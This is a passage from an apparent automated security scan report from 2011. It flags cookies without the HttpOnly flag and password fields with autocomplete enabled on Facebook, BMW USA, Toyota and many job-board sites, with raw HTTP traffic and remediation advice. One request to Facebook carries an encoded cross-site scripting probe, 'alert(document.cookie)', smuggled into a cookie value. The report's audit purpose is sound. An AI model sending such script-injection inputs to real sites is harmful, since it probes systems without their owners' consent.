Path:	/jsenvconst.ashx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3661;expires=Sat, 22-Jan-11 00:30:43 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

10.436. http://www.buyatoyota.com/NationalLanding.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.buyatoyota.com
Path:	/NationalLanding.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

bgImage=Toyotathon_Flash_Piece; domain=.buyatoyota.com; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /NationalLanding.aspx HTTP/1.1
Host: www.buyatoyota.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.437. http://www.facebook.com/BMWUSA previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/BMWUSA

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

lsd=EvrQb; path=/; domain=.facebook.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

10.438. http://www.facebook.com/EmploymentXing previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/EmploymentXing

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

lsd=Z_NLA; path=/; domain=.facebook.com
reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2FEmploymentXing; path=/; domain=.facebook.com
reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2FEmploymentXing; path=/; domain=.facebook.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.439. http://www.facebook.com/pages/JD2B/298408284363 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/pages/JD2B/298408284363

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

lsd=jal5o; path=/; domain=.facebook.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

10.440. http://www.facebook.com/piyush.v.bhatt previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/piyush.v.bhatt

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

lsd=WABbM; path=/; domain=.facebook.com
reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fpiyush.v.bhatt; path=/; domain=.facebook.com
reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpiyush.v.bhatt; path=/; domain=.facebook.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.441. http://www.facebook.com/profile.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/profile.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

lsd=pcnfa; path=/; domain=.facebook.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

10.442. http://www.facebook.com/yahoonews previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/yahoonews

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

lsd=A3j8b; path=/; domain=.facebook.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /yahoonews HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dtheclicker.todayshow.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Ftheclicker.todayshow.com%252F%253F28d8a%252522%25253E%25253Cscript%25253Ealert%2528document.cookie%2529%25253C%252Fscript%25253E1b20a3de4c0%253D1%26extra_2%3DUS;

Response

10.443. https://www.lowermybills.com/lending/home-refinance/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.lowermybills.com
Path:	/lending/home-refinance/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

SERVER_COOKIE=173.193.214.243.1295638882514991; path=/; expires=Sun, 20-Jan-13 19:41:22 GMT
BIGipServerpl.lmb2prod=872685578.20480.0000; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /lending/home-refinance/ HTTP/1.1
Host: www.lowermybills.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.444. http://www.omniture.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerhttp_omniture=84542986.5892.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Server: Omniture AWS/2.0.0
Location: http://www.omniture.com/en/
Content-Length: 313
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Date: Fri, 21 Jan 2011 19:41:23 GMT
Connection: close
Set-Cookie: BIGipServerhttp_omniture=84542986.5892.0000; path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www.omniture.com
...[SNIP]...

10.445. http://www.toyotafinancial.com/consumer/tfs.portal previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.toyotafinancial.com
Path:	/consumer/tfs.portal

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ofsc=jc98N5JMXvLLjLZFlFRQcc3KJbJlSv4lvpbgGG4LTpMJ6ZqH1DQL!2083777476!658673615; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /consumer/tfs.portal HTTP/1.1
Host: www.toyotafinancial.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.446. http://www.velaw.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.velaw.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=www.velaw.com&SiteLanguage=1033; path=/
EktGUID=bf5fdf70-b7e5-4354-a7e6-1e156b18231d; expires=Sat, 21-Jan-2012 18:24:59 GMT; path=/
EkAnalytics=newuser; expires=Sat, 21-Jan-2012 18:24:59 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.velaw.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=vinson+elkins
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 18:24:59 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=www.velaw.com&SiteLanguage=1033; path=/
Set-Cookie: EktGUID=bf5fdf70-b7e5-4354-a7e6-1e156b18231d; expires=Sat, 21-Jan-2012 18:24:59 GMT; path=/
Set-Cookie: EkAnalytics=newuser; expires=Sat, 21-Jan-2012 18:24:59 GMT; path=/
Set-Cookie: ASP.NET_SessionId=obqhqxaluhyuqcmur1ytfz45; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 30768

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><sc
...[SNIP]...

11. Password field with autocomplete enabled previous next
There are 138 instances of this issue:

http://www.100kcrossing.com/
http://www.accountingcrossing.com/
http://www.accountmanagementcrossing.com/
http://www.actuarialcrossing.com/
http://www.admincrossing.com/
http://www.advertisingcrossing.com/
http://www.aerospacecrossing.com/
http://www.agriculturalcrossing.com/
http://www.architecturecrossing.com/
http://www.attorneyresume.com/
http://www.attorneyresume.com/
http://www.auditorcrossing.com/
http://www.automotivecrossing.com/
http://www.aviationcrossing.com/
http://www.bilingualcrossing.com/
http://www.biotechcrossing.com/
http://www.bluecollarcrossing.com/
https://www.bmwusa.com/Secured/Content/Forms/Login.aspx
https://www.bmwusa.com/Secured/Content/Forms/Login.aspx
http://www.businessanalystcrossing.com/
http://www.businessdevelopmentcrossing.com/
http://www.callcentercrossing.com/
http://www.chefcrossing.com/
http://www.civilengineeringcrossing.com/
http://www.clevelcrossing.com/
http://www.clinicalresearchcrossing.com/
http://www.compliancecrossing.com/
http://www.computeraideddesigncrossing.com/
http://www.constructioncrossing.com/
http://www.consultingcrossing.com/
http://www.contractmanagementcrossing.com/
http://www.counselingcrossing.com/
http://www.cpluspluscrossing.com/
http://www.customerservicecrossing.com/
http://www.dbacrossing.com/
http://www.dentalcrossing.com/
http://www.designingcrossing.com/
http://www.diversitycrossing.com/
http://www.dotnetcrossing.com/
http://www.ecommercecrossing.com/
http://www.editingcrossing.com/
http://www.educationcrossing.com/
http://www.employmentcrossing.com/
http://www.energycrossing.com/
http://www.engineeringcrossing.com/
http://www.entrylevelcrossing.com/
http://www.environmentalcrossing.com/
http://www.environmentalsafetyhealthcrossing.com/
http://www.ericmmartin.com/projects/simplemodal/
http://www.erpcrossing.com/
http://www.execcrossing.com/
http://www.facebook.com/BMWUSA
http://www.facebook.com/EmploymentXing
http://www.facebook.com/pages/JD2B/298408284363
http://www.facebook.com/piyush.v.bhatt
http://www.facebook.com/plugins/likebox.php
http://www.facebook.com/yahoonews
http://www.facilitiescrossing.com/
http://www.financialservicescrossing.com/
http://www.foodservicescrossing.com/
http://www.fundraisingcrossing.com/
http://www.giscrossing.com/
http://www.governmentcrossing.com/
http://www.graduateschoolloans.com/
http://www.healthcarecrossing.com/
http://www.helpdeskcrossing.com/
http://www.hospitalitycrossing.com/
http://www.hrcrossing.com/
http://www.hvaccrossing.com/
http://www.informationtechnologycrossing.com/
http://www.insurcrossing.com/
http://www.intellectualpropertycrossing.com/
http://www.internshipcrossing.com/
http://www.j2eecrossing.com/
http://www.journalismcrossing.com/
http://www.lawcrossing.com/
http://www.lawcrossing.com/
http://www.lawcrossing.com/article/6070/Brooklyn-Law-School/
http://www.lawcrossing.com/article/6154/Anne-Healy-LIDS/
http://www.lawcrossing.com/images/banner/lc_bannerforjdj125x125.gif/
http://www.lawcrossing.com/lcjssearchresults.php
http://www.lawcrossing.com/salarysurvey/lcsalarysurvey.php
http://www.lawschoolloans.com/
http://www.logisticscrossing.com/
http://www.managercrossing.com/
http://www.manufacturingcrossing.com/
http://www.marketingcrossing.com/
http://www.mediajobcrossing.com/
http://www.medicalschoolloans.com/
http://www.militarycrossing.com/
http://www.nursingcrossing.com/
http://www.occupationaltherapycrossing.com/
http://www.operationscrossing.com/
http://www.parttimecrossing.com/
http://www.pharmaceuticalcrossing.com/
http://www.physicalsecuritycrossing.com/
http://www.physicaltherapycrossing.com/
http://www.planningcrossing.com/
http://www.postdoctoralfellowcrossing.com/
http://www.prcrossing.com/
http://www.preferredresumes.com/
http://www.procurementcrossing.com/
http://www.productmanagercrossing.com/
http://www.projectmanagementcrossing.com/
http://www.publicinterestcrossing.com/
http://www.publishingcrossing.com/
http://www.purchasingcrossing.com/
http://www.qaqccrossing.com/
http://www.radiocrossing.com/
http://www.realestateandlandcrossing.com/
http://www.recruitingcrossing.com/
http://www.researchingcrossing.com/
http://www.resumeboomer.com/
http://www.resumeboomer.com/
http://www.retailcrossing.com/
http://www.sciencescrossing.com/
http://www.scientistcrossing.com/
http://www.sellingcrossing.com/
http://www.sqlcrossing.com/
http://www.teenagercrossing.com/
http://www.telecomcrossing.com/
http://www.toyota.com/owners/
http://www.tradingcrossing.com/
http://www.trainingcrossing.com/
http://www.transportationcrossing.com/
http://www.travelingcrossing.com/
http://www.truckingcrossing.com/
http://www.tvcrossing.com/
http://www.underwritingcrossing.com/
http://www.vault.com/wps/portal/usa/companies/company-profile/Vinson-&-Elkins-LLP
http://www.vault.com/wps/portal/usa/companies/company-profile/Vinson-&-Elkins-LLP
http://www.vault.com/wps/portal/usa/companies/company-profile/Vinson-&-Elkins-LLP
http://www.vault.com/wps/portal/usa/companies/company-profile/Vinson-&-Elkins-LLP
http://www.veterinarycrossing.com/
http://www.volunteercrossing.com/
http://www.woothemes.com/
http://www.workathomecrossing.com/
http://www.writingcrossing.com/

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).

11.1. http://www.100kcrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.100kcrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL:

http://www.100kcrossing.com/index.php

The form contains the following password field with autocomplete enabled:

clslogin_password

Request

GET / HTTP/1.1
Host: www.100kcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.2. http://www.accountingcrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.accountingcrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL:

http://www.accountingcrossing.com/index.php

The form contains the following password field with autocomplete enabled:

clslogin_password

Request

GET / HTTP/1.1
Host: www.accountingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.3. http://www.accountmanagementcrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.accountmanagementcrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL:

http://www.accountmanagementcrossing.com/index.php

The form contains the following password field with autocomplete enabled:

clslogin_password

Request

GET / HTTP/1.1
Host: www.accountmanagementcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.4. http://www.actuarialcrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.actuarialcrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL:

http://www.actuarialcrossing.com/index.php

The form contains the following password field with autocomplete enabled:

clslogin_password

Request

GET / HTTP/1.1
Host: www.actuarialcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.5. http://www.admincrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.admincrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL:

http://www.admincrossing.com/index.php

The form contains the following password field with autocomplete enabled:

clslogin_password

Request

GET / HTTP/1.1
Host: www.admincrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.6. http://www.advertisingcrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.advertisingcrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL:

http://www.advertisingcrossing.com/index.php

The form contains the following password field with autocomplete enabled:

clslogin_password

Request

GET / HTTP/1.1
Host: www.advertisingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:21:29 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=4vstlithvj0cev5m57soav4bi3; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:21:29 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:21:29 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:21:29 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:21:29 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:21:29 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:21:29 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:21:29 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:21:29 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 121935

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.advertisingcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">  <input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
      <input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

11.7. http://www.aerospacecrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.aerospacecrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL:

http://www.aerospacecrossing.com/index.php

The form contains the following password field with autocomplete enabled:

clslogin_password

Request

GET / HTTP/1.1
Host: www.aerospacecrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.8. http://www.agriculturalcrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.agriculturalcrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL:

http://www.agriculturalcrossing.com/index.php

The form contains the following password field with autocomplete enabled:

clslogin_password

Request

GET / HTTP/1.1
Host: www.agriculturalcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.9. http://www.architecturecrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.architecturecrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL:

http://www.architecturecrossing.com/index.php

The form contains the following password field with autocomplete enabled:

clslogin_password

Request

GET / HTTP/1.1
Host: www.architecturecrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.10. http://www.attorneyresume.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.attorneyresume.com
Path:	/

Issue detail

The page contains a form with the following action URL:

http://www.attorneyresume.com/

The form contains the following password field with autocomplete enabled:

clslogin_password

Request

GET / HTTP/1.1
Host: www.attorneyresume.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.11. http://www.attorneyresume.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.attorneyresume.com
Path:	/

Issue detail

The page contains a form with the following action URL:

http://www.attorneyresume.com/?utm_source=JDJ&utm_medium=Banner&utm_campaign=Benefits300x130\

The form contains the following password field with autocomplete enabled:

clslogin_password

Request

GET /?utm_source=JDJ&utm_medium=Banner&utm_campaign=Benefits300x130\ HTTP/1.1
Host: www.attorneyresume.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.12. http://www.auditorcrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.auditorcrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL:

http://www.auditorcrossing.com/index.php

The form contains the following password field with autocomplete enabled:

clslogin_password

Request

GET / HTTP/1.1
Host: www.auditorcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.13. http://www.automotivecrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.automotivecrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL:

http://www.automotivecrossing.com/index.php

The form contains the following password field with autocomplete enabled:

clslogin_password

Request

GET / HTTP/1.1
Host: www.automotivecrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.14. http://www.aviationcrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.aviationcrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL:

http://www.aviationcrossing.com/index.php

The form contains the following password field with autocomplete enabled:

clslogin_password

Request

GET / HTTP/1.1
Host: www.aviationcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.15. http://www.bilingualcrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.bilingualcrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL:

http://www.bilingualcrossing.com/index.php

The form contains the following password field with autocomplete enabled:

clslogin_password

Request

GET / HTTP/1.1
Host: www.bilingualcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.16. http://www.biotechcrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.biotechcrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL:

http://www.biotechcrossing.com/index.php

The form contains the following password field with autocomplete enabled:

clslogin_password

Request

GET / HTTP/1.1
Host: www.biotechcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.17. http://www.bluecollarcrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.bluecollarcrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL:

http://www.bluecollarcrossing.com/index.php

The form contains the following password field with autocomplete enabled:

clslogin_password

Request

GET / HTTP/1.1
Host: www.bluecollarcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.18. https://www.bmwusa.com/Secured/Content/Forms/Login.aspx previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.bmwusa.com
Path:	/Secured/Content/Forms/Login.aspx

Issue detail

The page contains a form with the following action URL:

https://www.bmwusa.com/Secured/Content/Forms/Login.aspx?enc=mwSSA92UKNV8IOQQODvBfnVrf6qU9VeS34q4mJ4c7s46MR9nJlvxG5Subq1kZIKK

The form contains the following password fields with autocomplete enabled:

ctl00$ctl00$ctl00$MasterContent$SideNavContent$tbPassword
ctl00$ctl00$ctl00$MasterContent$SideNavContent$tbMFAnswer

Request

GET /Secured/Content/Forms/Login.aspx?enc=mwSSA92UKNV8IOQQODvBfnVrf6qU9VeS34q4mJ4c7s46MR9nJlvxG5Subq1kZIKK HTTP/1.1
Host: www.bmwusa.com
Connection: keep-alive
Referer: https://www.bmwusa.com/Secured/FrameCheck.aspx?enc=mNb/G1por6O4zQx3pFlIRgoOd9yR4xuGKlgEfPPlic47gKOkrYw3RkRXQnOaIp43
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349; WK9733P=JhuYOfcghHTiCqgKmpjCnVgApuKM86S2aIJ5l1grGrWiHX+M3QHtrjm/1B331Jqh; ASP.NET_SessionId=nt0wfon42yzcy5iixeimo055; NSC_CNX_21529_64.29.204.16=4f52b42b3661

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Pragma: no-cache
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Date: Sat, 22 Jan 2011 00:10:40 GMT
Connection: keep-alive
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3661;expires=Sat, 22-Jan-11 00:30:40 GMT;path=/
Content-Length: 212247

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
<body id="ctl00_ctl00_ctl00_BodyTag">
<form name="aspnetForm" method="post" action="/Secured/Content/Forms/Login.aspx?enc=mwSSA92UKNV8IOQQODvBfnVrf6qU9VeS34q4mJ4c7s46MR9nJlvxG5Subq1kZIKK" onsubmit="javascript:return WebForm_OnSubmit();" id="aspnetForm" onreset="if (window.setTimeout) window.setTimeout('VAM_OnReset(false);', 100);">
<div>
...[SNIP]...
<div class="signInInput">
                            <input name="ctl00$ctl00$ctl00$MasterContent$SideNavContent$tbPassword" type="password" maxlength="32" id="ctl00_ctl00_ctl00_MasterContent_SideNavContent_tbPassword" class="regTextBox" style="width:200px;" />

                        </div>
...[SNIP]...
<td valign="middle">
                                               <input name="ctl00$ctl00$ctl00$MasterContent$SideNavContent$tbMFAnswer" type="password" maxlength="50" id="ctl00_ctl00_ctl00_MasterContent_SideNavContent_tbMFAnswer" onkeypress="return(VAM_KeyPress(this, event))" onkeydown="return(VAM_OnKeyDown(this, event))" style="width:182px;" />
                                           </td>
...[SNIP]...

11.19. https://www.bmwusa.com/Secured/Content/Forms/Login.aspx previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.bmwusa.com
Path:	/Secured/Content/Forms/Login.aspx

Issue detail

The page contains a form with the following action URL:

https://www.bmwusa.com/Secured/Content/Forms/Login.aspx

The form contains the following password fields with autocomplete enabled:

ctl00$ctl00$ctl00$MasterContent$SideNavContent$tbPassword
ctl00$ctl00$ctl00$MasterContent$SideNavContent$tbMFAnswer

Request

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Pragma: no-cache
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 19:51:48 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3661;expires=Fri, 21-Jan-11 20:11:48 GMT;path=/
Content-Length: 212811

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
<body id="ctl00_ctl00_ctl00_BodyTag">
